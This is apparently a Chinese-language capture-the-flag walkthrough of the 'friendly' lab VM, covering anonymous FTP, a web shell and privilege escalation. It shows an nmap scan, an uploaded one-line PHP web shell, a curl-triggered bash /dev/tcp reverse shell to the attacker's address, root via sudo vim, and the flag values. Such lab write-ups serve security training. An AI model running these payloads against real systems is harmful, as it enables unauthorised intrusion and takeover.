难度:easy
kali:192.168.56.104
靶机:192.168.56.177
┌──(root㉿kali2)-[~/Desktop]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:c6:2d:d8 PCS Systemtechnik GmbH
192.168.56.177 08:00:27:a2:9f:c0 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.043 seconds (125.31 hosts/sec). 3 responded端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.177 -sV -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 12:51 CST
Nmap scan report for 192.168.56.177
Host is up (0.00036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:A2:9F:C0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.56.177
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.28 seconds开启了21 80两个端口
ftp匿名登录
┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.177
Connected to 192.168.56.177.
220 ProFTPD Server (friendly) [::ffff:192.168.56.177]
Name (192.168.56.177:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||62814|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
226 Transfer complete
ftp> ls
229 Entering Extended Passive Mode (|||27311|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
226 Transfer complete
ftp> get index.html
local: index.html remote: index.html
229 Entering Extended Passive Mode (|||54379|)
150 Opening BINARY mode data connection for index.html (10725 bytes)
100% |********************************************************************************************************************************************************************************************| 10725 116.22 MiB/s 00:00 ETA
226 Transfer complete
10725 bytes received in 00:00 (949.73 KiB/s)打开看了一下是个apache2默认界面,打开web发现正好对应这个界面,说明ftp就是html的目录,那么可以替换成一个反弹shell的php文件,我喜欢传个一句话木马
getshell
┌──(root㉿kali2)-[~/Desktop]
└─# cat aa.php
<?=`$_GET[1]`;put到机器上
ftp> put aa.php
local: aa.php remote: aa.php
229 Entering Extended Passive Mode (|||2199|)
150 Opening BINARY mode data connection for aa.php
100% |**********************************************************************************************************************************************************************************************| 15 209.26 KiB/s 00:00 ETA
226 Transfer complete
15 bytes sent in 00:00 (21.41 KiB/s)┌──(root㉿kali2)-[~/Desktop]
└─# curl http://192.168.56.177/aa.php?1=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261%27┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.177] 54136
bash: cannot set terminal process group (441): Inappropriate ioctl for device
bash: no job control in this shell
www-data@friendly:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)提权root
www-data@friendly:/home/RiJaba1$ ls
CTF Private YouTube user.txt
www-data@friendly:/home/RiJaba1$ cat user.txt
b8cff8c9008e1c98a1f2937b4475acd6
www-data@friendly:/home/RiJaba1$ 在RiJaba目录下拿到user flag,但是还没有RiJaba权限
看一下sudo
www-data@friendly:/home/RiJaba1$ sudo -l
Matching Defaults entries for www-data on friendly:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on friendly:
(ALL : ALL) NOPASSWD: /usr/bin/vim阿这,直接vim提权,底端命令行输入!bash
~
~
~
~
~ VIM - Vi IMproved
~
~ version 8.2.2434
~ by Bram Moolenaar et al.
~ Modified by team+vim@tracker.debian.org
~ Vim is open source and freely distributable
~
~ Become a registered Vim user!
~ type :help register<Enter> for information
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version8<Enter> for version info
~
~
~
~
~
:!bash
root@friendly:/home/RiJaba1# id
uid=0(root) gid=0(root) groups=0(root)拿到root权限
root@friendly:~# ls -al
total 32
drwx------ 3 root root 4096 May 27 01:06 .
drwxr-xr-x 18 root root 4096 Mar 11 2023 ..
lrwxrwxrwx 1 root root 9 Feb 23 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 Feb 21 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw------- 1 root root 839 May 27 01:06 .viminfo
-r-xr-xr-x 1 root root 509 Mar 11 2023 interfaces.sh
-r-------- 1 root root 24 Mar 11 2023 root.txt
root@friendly:~# cat ro*
Not yet! Find root.txt.看root.txt提示还没有完成,找到root.txt,直接find一手
root@friendly:~# find / -name root.txt 2>/dev/null
/var/log/apache2/root.txt
/root/root.txt
root@friendly:~# cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f果然是friendly的靶机,十分钟内拿下,饭还没吃完,晚上回来做2。